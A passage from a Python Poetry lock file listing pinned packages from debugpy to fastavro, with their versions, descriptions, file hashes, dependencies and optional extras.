{file = "debugpy-1.8.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ef9ab7df0b9a42ed9c878afd3eaaff471fce3fa73df96022e1f5c9f8f8c87ada"},
{file = "debugpy-1.8.0-cp310-cp310-win32.whl", hash = "sha256:a8b7a2fd27cd9f3553ac112f356ad4ca93338feadd8910277aff71ab24d8775f"},
{file = "debugpy-1.8.0-cp310-cp310-win_amd64.whl", hash = "sha256:5d9de202f5d42e62f932507ee8b21e30d49aae7e46d5b1dd5c908db1d7068637"},
{file = "debugpy-1.8.0-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:ef54404365fae8d45cf450d0544ee40cefbcb9cb85ea7afe89a963c27028261e"},
{file = "debugpy-1.8.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:60009b132c91951354f54363f8ebdf7457aeb150e84abba5ae251b8e9f29a8a6"},
{file = "debugpy-1.8.0-cp311-cp311-win32.whl", hash = "sha256:8cd0197141eb9e8a4566794550cfdcdb8b3db0818bdf8c49a8e8f8053e56e38b"},
{file = "debugpy-1.8.0-cp311-cp311-win_amd64.whl", hash = "sha256:a64093656c4c64dc6a438e11d59369875d200bd5abb8f9b26c1f5f723622e153"},
{file = "debugpy-1.8.0-cp38-cp38-macosx_11_0_x86_64.whl", hash = "sha256:b05a6b503ed520ad58c8dc682749113d2fd9f41ffd45daec16e558ca884008cd"},
{file = "debugpy-1.8.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3c6fb41c98ec51dd010d7ed650accfd07a87fe5e93eca9d5f584d0578f28f35f"},
{file = "debugpy-1.8.0-cp38-cp38-win32.whl", hash = "sha256:46ab6780159eeabb43c1495d9c84cf85d62975e48b6ec21ee10c95767c0590aa"},
{file = "debugpy-1.8.0-cp38-cp38-win_amd64.whl", hash = "sha256:bdc5ef99d14b9c0fcb35351b4fbfc06ac0ee576aeab6b2511702e5a648a2e595"},
{file = "debugpy-1.8.0-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:61eab4a4c8b6125d41a34bad4e5fe3d2cc145caecd63c3fe953be4cc53e65bf8"},
{file = "debugpy-1.8.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:125b9a637e013f9faac0a3d6a82bd17c8b5d2c875fb6b7e2772c5aba6d082332"},
{file = "debugpy-1.8.0-cp39-cp39-win32.whl", hash = "sha256:57161629133113c97b387382045649a2b985a348f0c9366e22217c87b68b73c6"},
{file = "debugpy-1.8.0-cp39-cp39-win_amd64.whl", hash = "sha256:e3412f9faa9ade82aa64a50b602544efcba848c91384e9f93497a458767e6926"},
{file = "debugpy-1.8.0-py2.py3-none-any.whl", hash = "sha256:9c9b0ac1ce2a42888199df1a1906e45e6f3c9555497643a85e0bf2406e3ffbc4"},
{file = "debugpy-1.8.0.zip", hash = "sha256:12af2c55b419521e33d5fb21bd022df0b5eb267c3e178f1d374a63a2a6bdccd0"},
]
[[package]]
name = "decorator"
version = "5.1.1"
description = "Decorators for Humans"
optional = false
python-versions = ">=3.5"
files = [
{file = "decorator-5.1.1-py3-none-any.whl", hash = "sha256:b8c3f85900b9dc423225913c5aace94729fe1fa9763b38939a95226f02d37186"},
{file = "decorator-5.1.1.tar.gz", hash = "sha256:637996211036b6385ef91435e4fae22989472f9d571faba8927ba8253acbc330"},
]
[[package]]
name = "deeplake"
version = "3.8.3"
description = "Activeloop Deep Lake"
optional = true
python-versions = "*"
files = [
{file = "deeplake-3.8.3.tar.gz", hash = "sha256:db6ea8b50549bab35579c2a6d70888356162d9aa89c18b55c16a9f5aeaf4a5fe"},
]
[package.dependencies]
aioboto3 = {version = ">=10.4.0", markers = "python_version >= \"3.7\" and sys_platform != \"win32\""}
boto3 = "*"
click = "*"
humbug = ">=0.3.1"
libdeeplake = "0.0.84"
lz4 = "*"
nest_asyncio = {version = "*", markers = "python_version >= \"3.7\" and sys_platform != \"win32\""}
numpy = "*"
pathos = "*"
pillow = "*"
pyjwt = "*"
tqdm = "*"
[package.extras]
all = ["IPython", "av (>=8.1.0)", "azure-cli", "azure-identity", "azure-storage-blob", "flask", "google-api-python-client (>=2.31.0,<2.32.0)", "google-auth (>=2.0.1,<2.1.0)", "google-auth-oauthlib (>=0.4.5,<0.5.0)", "google-cloud-storage (>=1.42.0,<1.43.0)", "laspy", "libdeeplake (==0.0.84)", "nibabel", "oauth2client (>=4.1.3,<4.2.0)", "pydicom"]
audio = ["av (>=8.1.0)"]
av = ["av (>=8.1.0)"]
azure = ["azure-cli", "azure-identity", "azure-storage-blob"]
dicom = ["nibabel", "pydicom"]
enterprise = ["libdeeplake (==0.0.84)", "pyjwt"]
gcp = ["google-auth (>=2.0.1,<2.1.0)", "google-auth-oauthlib (>=0.4.5,<0.5.0)", "google-cloud-storage (>=1.42.0,<1.43.0)"]
gdrive = ["google-api-python-client (>=2.31.0,<2.32.0)", "google-auth (>=2.0.1,<2.1.0)", "google-auth-oauthlib (>=0.4.5,<0.5.0)", "oauth2client (>=4.1.3,<4.2.0)"]
medical = ["nibabel", "pydicom"]
point-cloud = ["laspy"]
video = ["av (>=8.1.0)"]
visualizer = ["IPython", "flask"]
[[package]]
name = "defusedxml"
version = "0.7.1"
description = "XML bomb protection for Python stdlib modules"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
files = [
{file = "defusedxml-0.7.1-py2.py3-none-any.whl", hash = "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61"},
{file = "defusedxml-0.7.1.tar.gz", hash = "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69"},
]
[[package]]
name = "deprecated"
version = "1.2.14"
description = "Python @deprecated decorator to deprecate old python classes, functions or methods."
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
files = [
{file = "Deprecated-1.2.14-py2.py3-none-any.whl", hash = "sha256:6fac8b097794a90302bdbb17b9b815e732d3c4720583ff1b198499d78470466c"},
{file = "Deprecated-1.2.14.tar.gz", hash = "sha256:e5323eb936458dccc2582dc6f9c322c852a775a27065ff2b0c4970b9d53d01b3"},
]
[package.dependencies]
wrapt = ">=1.10,<2"
[package.extras]
dev = ["PyTest", "PyTest-Cov", "bump2version (<1)", "sphinx (<2)", "tox"]
[[package]]
name = "deprecation"
version = "2.1.0"
description = "A library to handle automated deprecations"
optional = true
python-versions = "*"
files = [
{file = "deprecation-2.1.0-py2.py3-none-any.whl", hash = "sha256:a10811591210e1fb0e768a8c25517cabeabcba6f0bf96564f8ff45189f90b14a"},
{file = "deprecation-2.1.0.tar.gz", hash = "sha256:72b3bde64e5d778694b0cf68178aed03d15e15477116add3fb773e581f9518ff"},
]
[package.dependencies]
packaging = "*"
[[package]]
name = "dill"
version = "0.3.7"
description = "serialize all of Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "dill-0.3.7-py3-none-any.whl", hash = "sha256:76b122c08ef4ce2eedcd4d1abd8e641114bfc6c2867f49f3c41facf65bf19f5e"},
{file = "dill-0.3.7.tar.gz", hash = "sha256:cc1c8b182eb3013e24bd475ff2e9295af86c1a38eb1aff128dac8962a9ce3c03"},
]
[package.extras]
graph = ["objgraph (>=1.7.2)"]
[[package]]
name = "distro"
version = "1.8.0"
description = "Distro - an OS platform information API"
optional = false
python-versions = ">=3.6"
files = [
{file = "distro-1.8.0-py3-none-any.whl", hash = "sha256:99522ca3e365cac527b44bde033f64c6945d90eb9f769703caaec52b09bbd3ff"},
{file = "distro-1.8.0.tar.gz", hash = "sha256:02e111d1dc6a50abb8eed6bf31c3e48ed8b0830d1ea2a1b78c61765c2513fdd8"},
]
[[package]]
name = "dnspython"
version = "2.4.2"
description = "DNS toolkit"
optional = true
python-versions = ">=3.8,<4.0"
files = [
{file = "dnspython-2.4.2-py3-none-any.whl", hash = "sha256:57c6fbaaeaaf39c891292012060beb141791735dbb4004798328fc2c467402d8"},
{file = "dnspython-2.4.2.tar.gz", hash = "sha256:8dcfae8c7460a2f84b4072e26f1c9f4101ca20c071649cb7c34e8b6a93d58984"},
]
[package.extras]
dnssec = ["cryptography (>=2.6,<42.0)"]
doh = ["h2 (>=4.1.0)", "httpcore (>=0.17.3)", "httpx (>=0.24.1)"]
doq = ["aioquic (>=0.9.20)"]
idna = ["idna (>=2.1,<4.0)"]
trio = ["trio (>=0.14,<0.23)"]
wmi = ["wmi (>=1.5.1,<2.0.0)"]
[[package]]
name = "docarray"
version = "0.32.1"
description = "The data structure for multimodal data"
optional = true
python-versions = ">=3.7,<4.0"
files = [
{file = "docarray-0.32.1-py3-none-any.whl", hash = "sha256:abd6d8999f44fd37b0c1d54f7cedd9007ab13b8b6c69933a9d30abbd0cbad5cd"},
{file = "docarray-0.32.1.tar.gz", hash = "sha256:ef349d2501d5cb0f205497e5e7de5b5d034965bdad98cf6daab1baa6aa3e39d2"},
]
[package.dependencies]
hnswlib = {version = ">=0.6.2", optional = true, markers = "extra == \"hnswlib\""}
numpy = ">=1.17.3"
orjson = ">=3.8.2"
protobuf = {version = ">=3.19.0", optional = true, markers = "extra == \"proto\" or extra == \"hnswlib\" or extra == \"full\""}
pydantic = ">=1.10.2"
rich = ">=13.1.0"
types-requests = ">=2.28.11.6"
typing-inspect = ">=0.8.0"
[package.extras]
audio = ["pydub (>=0.25.1,<0.26.0)"]
aws = ["smart-open[s3] (>=6.3.0)"]
elasticsearch = ["elastic-transport (>=8.4.0,<9.0.0)", "elasticsearch (>=7.10.1)"]
full = ["av (>=10.0.0)", "lz4 (>=1.0.0)", "pandas (>=1.1.0)", "pillow (>=9.3.0)", "protobuf (>=3.19.0)", "pydub (>=0.25.1,<0.26.0)", "trimesh[easy] (>=3.17.1)", "types-pillow (>=9.3.0.1)"]
hnswlib = ["hnswlib (>=0.6.2)", "protobuf (>=3.19.0)"]
image = ["pillow (>=9.3.0)", "types-pillow (>=9.3.0.1)"]
jac = ["jina-hubble-sdk (>=0.34.0)"]
mesh = ["trimesh[easy] (>=3.17.1)"]
pandas = ["pandas (>=1.1.0)"]
proto = ["lz4 (>=1.0.0)", "protobuf (>=3.19.0)"]
qdrant = ["qdrant-client (>=1.1.4)"]
torch = ["torch (>=1.0.0)"]
video = ["av (>=10.0.0)"]
weaviate = ["weaviate-client (>=3.15)"]
web = ["fastapi (>=0.87.0)"]
[[package]]
name = "docker"
version = "6.1.3"
description = "A Python library for the Docker Engine API."
optional = true
python-versions = ">=3.7"
files = [
{file = "docker-6.1.3-py3-none-any.whl", hash = "sha256:aecd2277b8bf8e506e484f6ab7aec39abe0038e29fa4a6d3ba86c3fe01844ed9"},
{file = "docker-6.1.3.tar.gz", hash = "sha256:aa6d17830045ba5ef0168d5eaa34d37beeb113948c413affe1d5991fc11f9a20"},
]
[package.dependencies]
packaging = ">=14.0"
pywin32 = {version = ">=304", markers = "sys_platform == \"win32\""}
requests = ">=2.26.0"
urllib3 = ">=1.26.0"
websocket-client = ">=0.32.0"
[package.extras]
ssh = ["paramiko (>=2.4.3)"]
[[package]]
name = "docopt"
version = "0.6.2"
description = "Pythonic argument parser, that will make you smile"
optional = true
python-versions = "*"
files = [
{file = "docopt-0.6.2.tar.gz", hash = "sha256:49b3a825280bd66b3aa83585ef59c4a8c82f2c8a522dbe754a8bc8d08c85c491"},
]
[[package]]
name = "duckdb"
version = "0.9.1"
description = "DuckDB embedded database"
optional = false
python-versions = ">=3.7.0"
files = [
{file = "duckdb-0.9.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:6c724e105ecd78c8d86b3c03639b24e1df982392fc836705eb007e4b1b488864"},
{file = "duckdb-0.9.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:75f12c5a3086079fb6440122565f1762ef1a610a954f2d8081014c1dd0646e1a"},
{file = "duckdb-0.9.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:151f5410c32f8f8fe03bf23462b9604349bc0b4bd3a51049bbf5e6a482a435e8"},
{file = "duckdb-0.9.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9c1d066fdae22b9b711b1603541651a378017645f9fbc4adc9764b2f3c9e9e4a"},
{file = "duckdb-0.9.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1de56d8b7bd7a7653428c1bd4b8948316df488626d27e9c388194f2e0d1428d4"},
{file = "duckdb-0.9.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:1fb6cd590b1bb4e31fde8efd25fedfbfa19a86fa72789fa5b31a71da0d95bce4"},
{file = "duckdb-0.9.1-cp310-cp310-win32.whl", hash = "sha256:1039e073714d668cef9069bb02c2a6756c7969cedda0bff1332520c4462951c8"},
{file = "duckdb-0.9.1-cp310-cp310-win_amd64.whl", hash = "sha256:7e6ac4c28918e1d278a89ff26fd528882aa823868ed530df69d6c8a193ae4e41"},
{file = "duckdb-0.9.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5eb750f2ee44397a61343f32ee9d9e8c8b5d053fa27ba4185d0e31507157f130"},
{file = "duckdb-0.9.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aea2a46881d75dc069a242cb164642d7a4f792889010fb98210953ab7ff48849"},
{file = "duckdb-0.9.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ed3dcedfc7a9449b6d73f9a2715c730180056e0ba837123e7967be1cd3935081"},
{file = "duckdb-0.9.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0c55397bed0087ec4445b96f8d55f924680f6d40fbaa7f2e35468c54367214a5"},
{file = "duckdb-0.9.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3261696130f1cfb955735647c93297b4a6241753fb0de26c05d96d50986c6347"},
{file = "duckdb-0.9.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:64c04b1728e3e37cf93748829b5d1e028227deea75115bb5ead01c608ece44b1"},
{file = "duckdb-0.9.1-cp311-cp311-win32.whl", hash = "sha256:12cf9fb441a32702e31534330a7b4d569083d46a91bf185e0c9415000a978789"},
{file = "duckdb-0.9.1-cp311-cp311-win_amd64.whl", hash = "sha256:fdfd85575ce9540e593d5d25c9d32050bd636c27786afd7b776aae0f6432b55e"},
{file = "duckdb-0.9.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:704700a4b469e3bb1a7e85ac12e58037daaf2b555ef64a3fe2913ffef7bd585b"},
{file = "duckdb-0.9.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cf55b303b7b1a8c2165a96e609eb30484bc47481d94a5fb1e23123e728df0a74"},
{file = "duckdb-0.9.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b70e23c14746904ca5de316436e43a685eb769c67fe3dbfaacbd3cce996c5045"},
{file = "duckdb-0.9.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:77379f7f1f8b4dc98e01f8f6f8f15a0858cf456e2385e22507f3cb93348a88f9"},
{file = "duckdb-0.9.1-cp37-cp37m-win32.whl", hash = "sha256:92c8f738489838666cae9ef41703f8b16f660bb146970d1eba8b2c06cb3afa39"},
{file = "duckdb-0.9.1-cp37-cp37m-win_amd64.whl", hash = "sha256:08c5484ac06ab714f745526d791141f547e2f5ac92f97a0a1b37dfbb3ea1bd13"},
{file = "duckdb-0.9.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:f66d3c07c7f6938d3277294677eb7dad75165e7c57c8dd505503fc5ef10f67ad"},
{file = "duckdb-0.9.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:c38044e5f78c0c7b58e9f937dcc6c34de17e9ca6be42f9f8f1a5a239f7a847a5"},
{file = "duckdb-0.9.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:73bc0d715b79566b3ede00c367235cfcce67be0eddda06e17665c7a233d6854a"},
{file = "duckdb-0.9.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d26622c3b4ea6a8328d95882059e3cc646cdc62d267d48d09e55988a3bba0165"},
{file = "duckdb-0.9.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3367d10096ff2b7919cedddcf60d308d22d6e53e72ee2702f6e6ca03d361004a"},
{file = "duckdb-0.9.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:d88a119f1cb41911a22f08a6f084d061a8c864e28b9433435beb50a56b0d06bb"},
{file = "duckdb-0.9.1-cp38-cp38-win32.whl", hash = "sha256:99567496e45b55c67427133dc916013e8eb20a811fc7079213f5f03b2a4f5fc0"},
{file = "duckdb-0.9.1-cp38-cp38-win_amd64.whl", hash = "sha256:5b3da4da73422a3235c3500b3fb541ac546adb3e35642ef1119dbcd9cc7f68b8"},
{file = "duckdb-0.9.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:eca00c0c2062c0265c6c0e78ca2f6a30611b28f3afef062036610e9fc9d4a67d"},
{file = "duckdb-0.9.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:eb5af8e89d40fc4baab1515787ea1520a6c6cf6aa40ab9f107df6c3a75686ce1"},
{file = "duckdb-0.9.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9fae3d4f83ebcb47995f6acad7c6d57d003a9b6f0e1b31f79a3edd6feb377443"},
{file = "duckdb-0.9.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:16b9a7efc745bc3c5d1018c3a2f58d9e6ce49c0446819a9600fdba5f78e54c47"},
{file = "duckdb-0.9.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:66b0b60167f5537772e9f5af940e69dcf50e66f5247732b8bb84a493a9af6055"},
{file = "duckdb-0.9.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:4f27f5e94c47df6c4ccddf18e3277b7464eea3db07356d2c4bf033b5c88359b8"},
{file = "duckdb-0.9.1-cp39-cp39-win32.whl", hash = "sha256:d43cd7e6f783006b59dcc5e40fcf157d21ee3d0c8dfced35278091209e9974d7"},
{file = "duckdb-0.9.1-cp39-cp39-win_amd64.whl", hash = "sha256:e666795887d9cf1d6b6f6cbb9d487270680e5ff6205ebc54b2308151f13b8cff"},
{file = "duckdb-0.9.1.tar.gz", hash = "sha256:603a878746015a3f2363a65eb48bcbec816261b6ee8d71eee53061117f6eef9d"},
]
[[package]]
name = "duckdb-engine"
version = "0.9.2"
description = "SQLAlchemy driver for duckdb"
optional = false
python-versions = ">=3.7"
files = [
{file = "duckdb_engine-0.9.2-py3-none-any.whl", hash = "sha256:764e83dfb37e2f0ce6afcb8e701299e7b28060a40fdae86cfd7f08e0fca4496a"},
{file = "duckdb_engine-0.9.2.tar.gz", hash = "sha256:efcd7b468f9b17e4480a97f0c60eade25cc081e8cfc04c46d63828677964b48f"},
]
[package.dependencies]
duckdb = ">=0.4.0"
sqlalchemy = ">=1.3.22"
[[package]]
name = "duckduckgo-search"
version = "3.9.3"
description = "Search for words, documents, images, news, maps and text translation using the DuckDuckGo.com search engine."
optional = true
python-versions = ">=3.8"
files = [
{file = "duckduckgo_search-3.9.3-py3-none-any.whl", hash = "sha256:4b462333378e9f78e138eccd73a315a54cb5208ebb07ab4ec179d9d18b2998b5"},
{file = "duckduckgo_search-3.9.3.tar.gz", hash = "sha256:f68aca605827df4e6b5b4ab00f9a891e103ec30809de092af42e885a617ab5ba"},
]
[package.dependencies]
aiofiles = ">=23.2.1"
click = ">=8.1.7"
httpx = {version = ">=0.25.0", extras = ["brotli", "http2", "socks"]}
lxml = ">=4.9.3"
[package.extras]
dev = ["black (>=23.9.1)", "isort (>=5.12.0)", "pytest (>=7.4.2)", "pytest-asyncio (>=0.21.1)", "ruff (>=0.0.291)"]
[[package]]
name = "elastic-transport"
version = "8.4.1"
description = "Transport classes and utilities shared among Python Elastic client libraries"
optional = true
python-versions = ">=3.6"
files = [
{file = "elastic-transport-8.4.1.tar.gz", hash = "sha256:e5548997113c5d9566c9a1a51ed67bce50a4871bc0e44b692166461279e4167e"},
{file = "elastic_transport-8.4.1-py3-none-any.whl", hash = "sha256:c718ce40e8217b6045604961463c10da69a152dda07af4e25b3feae8d7965fc0"},
]
[package.dependencies]
certifi = "*"
urllib3 = ">=1.26.2,<2"
[package.extras]
develop = ["aiohttp", "furo", "mock", "pytest", "pytest-asyncio", "pytest-cov", "pytest-httpserver", "pytest-mock", "requests", "sphinx (>2)", "sphinx-autodoc-typehints", "trustme"]
[[package]]
name = "elasticsearch"
version = "8.10.1"
description = "Python client for Elasticsearch"
optional = true
python-versions = ">=3.6, <4"
files = [
{file = "elasticsearch-8.10.1-py3-none-any.whl", hash = "sha256:68141d42d10c7f67ac466ca00496830d3b81a7e9476c3baa5585060832c60c69"},
{file = "elasticsearch-8.10.1.tar.gz", hash = "sha256:2cb56b433daa2d3ef1aaa2e5a5eacd36ba1d66884722f3d7759a4f9d16190059"},
]
[package.dependencies]
elastic-transport = ">=8,<9"
[package.extras]
async = ["aiohttp (>=3,<4)"]
requests = ["requests (>=2.4.0,<3.0.0)"]
[[package]]
name = "entrypoints"
version = "0.4"
description = "Discover and load entry points from installed packages."
optional = true
python-versions = ">=3.6"
files = [
{file = "entrypoints-0.4-py3-none-any.whl", hash = "sha256:f174b5ff827504fd3cd97cc3f8649f3693f51538c7e4bdf3ef002c8429d42f9f"},
{file = "entrypoints-0.4.tar.gz", hash = "sha256:b706eddaa9218a19ebcd67b56818f05bb27589b1ca9e8d797b74affad4ccacd4"},
]
[[package]]
name = "esprima"
version = "4.0.1"
description = "ECMAScript parsing infrastructure for multipurpose analysis in Python"
optional = true
python-versions = "*"
files = [
{file = "esprima-4.0.1.tar.gz", hash = "sha256:08db1a876d3c2910db9cfaeb83108193af5411fc3a3a66ebefacd390d21323ee"},
]
[[package]]
name = "exceptiongroup"
version = "1.1.3"
description = "Backport of PEP 654 (exception groups)"
optional = false
python-versions = ">=3.7"
files = [
{file = "exceptiongroup-1.1.3-py3-none-any.whl", hash = "sha256:343280667a4585d195ca1cf9cef84a4e178c4b6cf2274caef9859782b567d5e3"},
{file = "exceptiongroup-1.1.3.tar.gz", hash = "sha256:097acd85d473d75af5bb98e41b61ff7fe35efe6675e4f9370ec6ec5126d160e9"},
]
[package.extras]
test = ["pytest (>=6)"]
[[package]]
name = "executing"
version = "2.0.0"
description = "Get the currently executing AST node of a frame, and other information"
optional = false
python-versions = "*"
files = [
{file = "executing-2.0.0-py2.py3-none-any.whl", hash = "sha256:06df6183df67389625f4e763921c6cf978944721abf3e714000200aab95b0657"},
{file = "executing-2.0.0.tar.gz", hash = "sha256:0ff053696fdeef426cda5bd18eacd94f82c91f49823a2e9090124212ceea9b08"},
]
[package.extras]
tests = ["asttokens (>=2.1.0)", "coverage", "coverage-enable-subprocess", "ipython", "littleutils", "pytest", "rich"]
[[package]]
name = "faiss-cpu"
version = "1.7.4"
description = "A library for efficient similarity search and clustering of dense vectors."
optional = true
python-versions = "*"
files = [
{file = "faiss-cpu-1.7.4.tar.gz", hash = "sha256:265dc31b0c079bf4433303bf6010f73922490adff9188b915e2d3f5e9c82dd0a"},
{file = "faiss_cpu-1.7.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:50d4ebe7f1869483751c558558504f818980292a9b55be36f9a1ee1009d9a686"},
{file = "faiss_cpu-1.7.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:7b1db7fae7bd8312aeedd0c41536bcd19a6e297229e1dce526bde3a73ab8c0b5"},
{file = "faiss_cpu-1.7.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:17b7fa7194a228a84929d9e6619d0e7dbf00cc0f717e3462253766f5e3d07de8"},
{file = "faiss_cpu-1.7.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dca531952a2e3eac56f479ff22951af4715ee44788a3fe991d208d766d3f95f3"},
{file = "faiss_cpu-1.7.4-cp310-cp310-win_amd64.whl", hash = "sha256:7173081d605e74766f950f2e3d6568a6f00c53f32fd9318063e96728c6c62821"},
{file = "faiss_cpu-1.7.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:d0bbd6f55d7940cc0692f79e32a58c66106c3c950cee2341b05722de9da23ea3"},
{file = "faiss_cpu-1.7.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e13c14280376100f143767d0efe47dcb32618f69e62bbd3ea5cd38c2e1755926"},
{file = "faiss_cpu-1.7.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c521cb8462f3b00c0c7dfb11caff492bb67816528b947be28a3b76373952c41d"},
{file = "faiss_cpu-1.7.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:afdd9fe1141117fed85961fd36ee627c83fc3b9fd47bafb52d3c849cc2f088b7"},
{file = "faiss_cpu-1.7.4-cp311-cp311-win_amd64.whl", hash = "sha256:2ff7f57889ea31d945e3b87275be3cad5d55b6261a4e3f51c7aba304d76b81fb"},
{file = "faiss_cpu-1.7.4-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:eeaf92f27d76249fb53c1adafe617b0f217ab65837acf7b4ec818511caf6e3d8"},
{file = "faiss_cpu-1.7.4-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:102b1bd763e9b0c281ac312590af3eaf1c8b663ccbc1145821fe6a9f92b8eaaf"},
{file = "faiss_cpu-1.7.4-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5512da6707c967310c46ff712b00418b7ae28e93cb609726136e826e9f2f14fa"},
{file = "faiss_cpu-1.7.4-cp37-cp37m-win_amd64.whl", hash = "sha256:0c2e5b9d8c28c99f990e87379d5bbcc6c914da91ebb4250166864fd12db5755b"},
{file = "faiss_cpu-1.7.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:43f67f325393145d360171cd98786fcea6120ce50397319afd3bb78be409fb8a"},
{file = "faiss_cpu-1.7.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:6a4e4af194b8fce74c4b770cad67ad1dd1b4673677fc169723e4c50ba5bd97a8"},
{file = "faiss_cpu-1.7.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:31bfb7b9cffc36897ae02a983e04c09fe3b8c053110a287134751a115334a1df"},
{file = "faiss_cpu-1.7.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:52d7de96abef2340c0d373c1f5cbc78026a3cebb0f8f3a5920920a00210ead1f"},
{file = "faiss_cpu-1.7.4-cp38-cp38-win_amd64.whl", hash = "sha256:699feef85b23c2c729d794e26ca69bebc0bee920d676028c06fd0e0becc15c7e"},
{file = "faiss_cpu-1.7.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:559a0133f5ed44422acb09ee1ac0acffd90c6666d1bc0d671c18f6e93ad603e2"},
{file = "faiss_cpu-1.7.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ea1d71539fe3dc0f1bed41ef954ca701678776f231046bf0ca22ccea5cf5bef6"},
{file = "faiss_cpu-1.7.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:12d45e0157024eb3249842163162983a1ac8b458f1a8b17bbf86f01be4585a99"},
{file = "faiss_cpu-1.7.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2f0eab359e066d32c874f51a7d4bf6440edeec068b7fe47e6d803c73605a8b4c"},
{file = "faiss_cpu-1.7.4-cp39-cp39-win_amd64.whl", hash = "sha256:98459ceeeb735b9df1a5b94572106ffe0a6ce740eb7e4626715dd218657bb4dc"},
]
[[package]]
name = "fastavro"
version = "1.8.2"
description = "Fast read/write of AVRO files"
optional = true
python-versions = ">=3.8"
files = [
{file = "fastavro-1.8.2-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:0e08964b2e9a455d831f2557402a683d4c4d45206f2ab9ade7c69d3dc14e0e58"},
{file = "fastavro-1.8.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:401a70b1e5c7161420c6019e0c8afa88f7c8a373468591f5ec37639a903c2509"},
{file = "fastavro-1.8.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:eef1ed3eaa4240c05698d02d8d0c010b9a03780eda37b492da6cd4c9d37e04ec"},
{file = "fastavro-1.8.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:543185a672ff6306beb329b57a7b8a3a2dd1eb21a5ccc530150623d58d48bb98"},
{file = "fastavro-1.8.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:ffbf8bae1edb50fe7beeffc3afa8e684686550c2e5d31bf01c25cfa213f581e1"},
{file = "fastavro-1.8.2-cp310-cp310-win_amd64.whl", hash = "sha256:bb545eb9d876bc7b785e27e98e7720ada7eee7d7a1729798d2ed51517f13500a"},
{file = "fastavro-1.8.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:2b837d3038c651046252bc92c1b9899bf21c7927a148a1ff89599c36c2a331ca"},
